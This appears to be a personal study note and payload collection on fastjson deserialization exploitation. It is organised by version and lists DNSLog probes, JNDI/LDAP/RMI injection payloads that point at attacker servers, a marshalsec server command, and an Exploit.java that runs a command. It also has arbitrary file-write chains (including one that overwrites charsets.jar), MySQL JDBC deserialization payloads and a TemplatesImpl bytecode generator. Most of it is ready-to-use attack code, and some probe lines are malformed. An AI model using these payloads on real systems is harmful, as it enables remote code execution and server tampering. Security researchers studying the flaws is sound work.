Learning fastjson deserialization

Reproduction

Tested version: 1.2.47

Confirming with DNSLog

{"@type":"java.net.Inet4Address", "val":"dnslog"}
{"@type":"java.net.Inet6Address", "val":"dnslog"}
{"@type":"java.net.InetSocketAddress"{"address":, "val":"dnslog"}}
{"@type":"com.alibaba.fastjson.JSONObject", {"@type": "java.net.URL", "val":"dnslog"}}""}
{{"@type":"java.net.URL", "val":"dnslog"}:"aaa"}
Set[{"@type":"java.net.URL", "val":"dnslog"}]
Set[{"@type":"java.net.URL", "val":"dnslog"}
{{"@type":"java.net.URL", "val":"dnslog"}:0
[{"a":"a\x]   (DoS vulnerability)
{"a":"
{"@type":"com.alibaba.fastjson.JSONObject", {"@type": "java.net.URL", "val":"dnslog"}}""}
{{"@type":"java.net.URL","val":"dnslog"}:"aaa"}
{{"@type":"java.net.URL","val":"dnslog"}:0
{{"@type":"java.net.URL","val":"http://%s"}:"x"}

<1.2.67
{"zeo":{"@type":"java.net.Inet4Address","val":"fatu5k.dnslog.cn"}}

>1.2.67
{"@type":"java.net.Inet4Address","val":"dnslog"}
{"@type":"java.net.Inet6Address","val":"dnslog"}

{"@type":"java.lang.AutoCloseable"
{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"ldap://quw3hz.dnslog.cn",
        "autoCommit":true
    }
}

JdbcRowSetImpl

python3 -m http.server
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8000/#Log4jRCE" 1389

Exploit.java

public class Exploit {
    public Exploit(){
        try{
            Runtime.getRuntime().exec(new String[]{"calc.exe"});
        }catch(Exception e){
            e.printStackTrace();
        }
    }
    public static void main(String[] argv){
        Exploit e = new Exploit();
    }
}

payload

{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName": "ldap://127.0.0.1:1389/Calc",
        "autoCommit": true
    }
}


Bypass on newer Java versions

Reference:

https://www.penson.top/article/av29#toc-heading-4

Payload collection:

Affected versions:

fastjson<=1.2.24

exp:

{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://x.x.x.x:1099/jndi", "autoCommit":true}

Affected versions:

fastjson<=1.2.41

Prerequisite: only usable when the autoTypeSupport property is true (the default is false since fastjson >= 1.2.25).

exp:

{"@type":"Lcom.sun.rowset.JdbcRowSetImpl;","dataSourceName":"rmi://x.x.x.x:1098/jndi", "autoCommit":true}

Affected versions:

fastjson<=1.2.42

Prerequisite: only usable when the autoTypeSupport property is true (the default is false since fastjson >= 1.2.25).

exp:

{"@type":"LLcom.sun.rowset.JdbcRowSetImpl;;","dataSourceName":"ldap://localhost:1399/Exploit", "autoCommit":true}

Affected versions:

fastjson<=1.2.43

Prerequisite: only usable when the autoTypeSupport property is true (the default is false since fastjson >= 1.2.25).

exp:

{"@type":"[com.sun.rowset.JdbcRowSetImpl"[{,"dataSourceName":"ldap://localhost:1399/Exploit", "autoCommit":true}

Affected versions:

fastjson<=1.2.45

Prerequisite: only usable when the autoTypeSupport property is true (the default is false since fastjson >= 1.2.25).

exp:

{"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"ldap://localhost:1399/Exploit"}}

Affected versions:

fastjson<=1.2.47

exp:

{
    "a": {
        "@type": "java.lang.Class",
        "val": "com.sun.rowset.JdbcRowSetImpl"
    },
    "b": {
        "@type": "com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName": "ldap://x.x.x.x:1999/Exploit",
        "autoCommit": true
    }
}

Affected versions:

fastjson<=1.2.62

exp:

{"@type":"org.apache.xbean.propertyeditor.JndiConverter","AsText":"rmi://127.0.0.1:1098/exploit"}

Affected versions:

fastjson<=1.2.66

Prerequisite: only usable when the autoTypeSupport property is true (the default is false since fastjson >= 1.2.25).

exp:

{"@type":"org.apache.shiro.jndi.JndiObjectFactory","resourceName":"ldap://192.168.80.1:1389/Calc"}

{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","metricRegistry":"ldap://192.168.80.1:1389/Calc"}

{"@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup","jndiNames":"ldap://192.168.80.1:1389/Calc"}

{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties": {"@type":"java.util.Properties","UserTransaction":"ldap://192.168.80.1:1399/Calc"}}

fastjson <= 1.2.68 arbitrary file write

{
    "x":{
        "@type":"java.lang.AutoCloseable",
        "@type":"sun.rmi.server.MarshalOutputStream",
        "out":{
            "@type":"java.util.zip.InflaterOutputStream",
            "out":{
                "@type":"java.io.FileOutputStream",
                "file":"/tmp/dest.txt",
                "append":false
            },
            "infl":{
                "input":"eJwL8nUyNDJSyCxWyEgtSgUAHKUENw=="
            },
            "bufLen":1048576
        },
        "protocolVersion":1
    }
}

{"x":{"@type":"java.lang.AutoCloseable","@type":"sun.rmi.server.MarshalOutputStream","out":{"@type":"java.util.zip.InflaterOutputStream","out":{"@type":"java.io.FileOutputStream","file":"/usr/lib/jvm/java-1.8.0-openjdk-1.8.0.282.b08-1.el7_9.x86_64/jre/lib/charsets.jar","append":false},"infl":{"input":"xxx"},"bufLen":1048576},"protocolVersion":1}}

{"x":{"@type":"java.nio.charset.Charset","val":"500"}}

This chain only exists on CentOS, so its applicability is narrow. When I tested on Windows it kept throwing errors; after some searching I found the reason:

When fastjson deserializes through a constructor that takes arguments, it checks whether the parameters have names, and only parameterized constructors whose parameters carry names are accepted.

And sun.rmi.server.MarshalOutputStream is not available on Windows.

commons-io arbitrary file write

ReaderInputStream + CharSequenceReader build the input stream.

WriterOutputStream + FileWriterWithEncoding build the output stream.

{  "x":{    "@type":"com.alibaba.fastjson.JSONObject",    "input":{      "@type":"java.lang.AutoCloseable",      "@type":"org.apache.commons.io.input.ReaderInputStream",      "reader":{        "@type":"org.apache.commons.io.input.CharSequenceReader",        "charSequence":{"@type":"java.lang.String""aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaapenson"      },      "charsetName":"UTF-8",      "bufferSize":1024    },    "branch":{      "@type":"java.lang.AutoCloseable",      "@type":"org.apache.commons.io.output.WriterOutputStream",      "writer":{        "@type":"org.apache.commons.io.output.FileWriterWithEncoding",        "file":"./1.txt",        "encoding":"UTF-8",        "append": false      },      "charsetName":"UTF-8",      "bufferSize": 1024,      "writeImmediately": true    },    "trigger":{      "@type":"java.lang.AutoCloseable",      "@type":"org.apache.commons.io.input.XmlStreamReader",      "is":{        "@type":"org.apache.commons.io.input.TeeInputStream",        "input":{          "$ref":"$.input"        },        "branch":{          "$ref":"$.branch"        },        "closeBranch": true      },      "httpContentType":"text/xml",      "lenient":false,      "defaultEncoding":"UTF-8"    },    "trigger2":{      "@type":"java.lang.AutoCloseable",      "@type":"org.apache.commons.io.input.XmlStreamReader",      "is":{        "@type":"org.apache.commons.io.input.TeeInputStream",        "input":{          "$ref":"$.input"        },        "branch":{          "$ref":"$.branch"        },        "closeBranch": true      },      "httpContentType":"text/xml",      "lenient":false,      "defaultEncoding":"UTF-8"    },    "trigger3":{      "@type":"java.lang.AutoCloseable",      "@type":"org.apache.commons.io.input.XmlStreamReader",      "is":{        "@type":"org.apache.commons.io.input.TeeInputStream",        "input":{       
   "$ref":"$.input"        },        "branch":{          "$ref":"$.branch"        },        "closeBranch": true      },      "httpContentType":"text/xml",      "lenient":false,      "defaultEncoding":"UTF-8"    }  }}
XmlStreamReader::InputStream is the TeeInputStream; TeeInputStream::InputStream (input) is the readerInputStream and TeeInputStream::OutputStream (branch) is the writerOutputStream:
import org.apache.commons.io.input.CharSequenceReader;
import org.apache.commons.io.input.ReaderInputStream;
import org.apache.commons.io.input.TeeInputStream;
import org.apache.commons.io.input.XmlStreamReader;
import org.apache.commons.io.output.FileWriterWithEncoding;
import org.apache.commons.io.output.WriterOutputStream;

public class Test {
    public static void main(String[] args) throws Exception {
        String test = "asd";
        CharSequenceReader charSequenceReader = new CharSequenceReader(test);
        ReaderInputStream readerInputStream = new ReaderInputStream(charSequenceReader, "UTF-8", 1024);
        FileWriterWithEncoding fileWriterWithEncoding = new FileWriterWithEncoding("1.txt", "UTF-8");
        WriterOutputStream writerOutputStream = new WriterOutputStream(fileWriterWithEncoding, "UTF-8", 1024, true);
        TeeInputStream teeInputStream = new TeeInputStream(readerInputStream, writerOutputStream);
        XmlStreamReader xmlStreamReader = new XmlStreamReader(teeInputStream);
    }
}

Drawback: only the first 8192 characters are written.

Required dependency:

        <dependency>
            <groupId>commons-io</groupId>
            <artifactId>commons-io</artifactId>
            <version>2.5</version>
        </dependency>

Chaitin's writeup already covers the detailed analysis; this is only a summary.

References:

https://www.cnblogs.com/zpchcbd/p/14969606.html

https://mp.weixin.qq.com/s/6fHJ7s6Xo4GEdEGpKFLOyg

fastjson <= 1.2.68 JDBC deserialization

        <dependency>
            <groupId>mysql</groupId>
            <artifactId>mysql-connector-java</artifactId>
            <version>5.1.12</version>
        </dependency>

{
    "name": {
        "@type": "java.lang.AutoCloseable",
        "@type": "com.mysql.jdbc.JDBC4Connection",
        "hostToConnectTo": "127.0.0.1",
        "portToConnectTo": 3306,
        "info": {
            "user": "CommonsCollections2",
            "password": "pass",
            "statementInterceptors": "com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor",
            "autoDeserialize": "true",
            "NUM_HOSTS": "1"
        },
        "databaseToConnectTo": "dbname",
        "url": ""
    }
}

CommonsCollections2 is the CC chain to be used.

        <dependency>
            <groupId>mysql</groupId>
            <artifactId>mysql-connector-java</artifactId>
            <version>6.0.2</version>
        </dependency>

{
    "name": {
        "@type": "java.lang.AutoCloseable",
        "@type": "com.mysql.cj.jdbc.ha.LoadBalancedMySQLConnection",
        "proxy": {
            "connectionString": {
                "url": "jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&statementInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&useSSL=false&user=yso_CommonsCollections2_calc"
            }
        }
    }
}

https://github.com/fnmsd/MySQL_Fake_Server

A malicious MySQL server is required; one has already been written (link above).

Reference:

https://www.cnblogs.com/pickmea/p/15157189.html

fastjson 1.2.68

{"@type":"java.lang.AutoCloseable", "@type":"com.mysql.jdbc.JDBC4Connection","hostToConnectTo":"172.20.64.40","portToConnectTo":3306,"url":"jdbc:mysql://172.20.64.40:3306/test?autoDeserialize=true&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor","databaseToConnectTo":"test","info":{"@type":"java.util.Properties","PORT":"3306","statementInterceptors":"com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor","autoDeserialize":"true","user":"yso_URLDNS_http://ahfladhjfd.6fehoy.dnslog.cn","PORT.1":"3306","HOST.1":"172.20.64.40","NUM_HOSTS":"1","HOST":"172.20.64.40","DBNAME":"test"}}

Solutions without outbound network access

Exploitation approach:

com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl

Constructing the TemplatesImpl POC is more involved than JdbcRowSetImpl, and it has a requirement on the deserialization Feature parameter: with parseObject you need JSON.parseObject(json, Object.class, Feature.SupportNonPublicField), and with parse you need JSON.parse(json, Feature.SupportNonPublicField). The advantage is that no outbound connection is needed to load the malicious class.

It is essentially a modified ysoserial CC chain, but the exploitation conditions are still quite strict: the Feature has to be set.

package com.fastjson;

import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.parser.Feature;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import javassist.CannotCompileException;
import javassist.ClassPool;
import javassist.CtClass;
import javassist.CtNewConstructor;
import org.apache.tomcat.util.codec.binary.Base64;

public class TemplatesImpl {
    public static CtClass makeClass() throws CannotCompileException {
        ClassPool classPool = ClassPool.getDefault();
        CtClass clazz = classPool.makeClass("com.summersec.x.Test" + System.nanoTime());
        clazz.addConstructor(CtNewConstructor.make("public Test(){ Runtime.getRuntime().exec(\"calc.exe\");}", clazz));
        return clazz;
    }

    public static void main(String args[]) throws Exception {
        ClassPool aDefault = ClassPool.getDefault();
        CtClass ctClass = makeClass();
        ctClass.setSuperclass((aDefault.get(AbstractTranslet.class.getName())));
        byte[] evilCode = ctClass.toBytecode();
        String encode = Base64.encodeBase64String(evilCode);
        String json = "{" +
                "    \"a\": {" +
                "        \"@type\": \"java.lang.Class\"," +
                "        \"val\": \"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl\"" +
                "        }," +
                "    \"b\": {" +
                "        \"@type\": \"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl\"," +
                "        \"_bytecodes\": [\"" + encode + "\"]," +
                "        '_name': 'a.b'," +
                "        '_tfactory': {}," +
                "        \"_outputProperties\": {}," +
                "        \"_name\": \"b\"," +
                "        \"_version\": \"1.0\"," +
                "        \"allowedProtocols\": \"all\"" +
                "      }" +
                "}";
        System.out.println(json);
        JSON.parseObject(json, Object.class, Feature.SupportNonPublicField);
    }
}

payload:

{
    "a": {
        "@type": "java.lang.Class",
        "val": "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl"
    },
    "b": {
        "@type": "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl",
        "_bytecodes": ["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"],
        '_name': 'a.b',
        '_tfactory': {},
        "_outputProperties": {},
        "_name": "b",
        "_version": "1.0",
        "allowedProtocols": "all"
    }
}

Combining with Tomcat echo

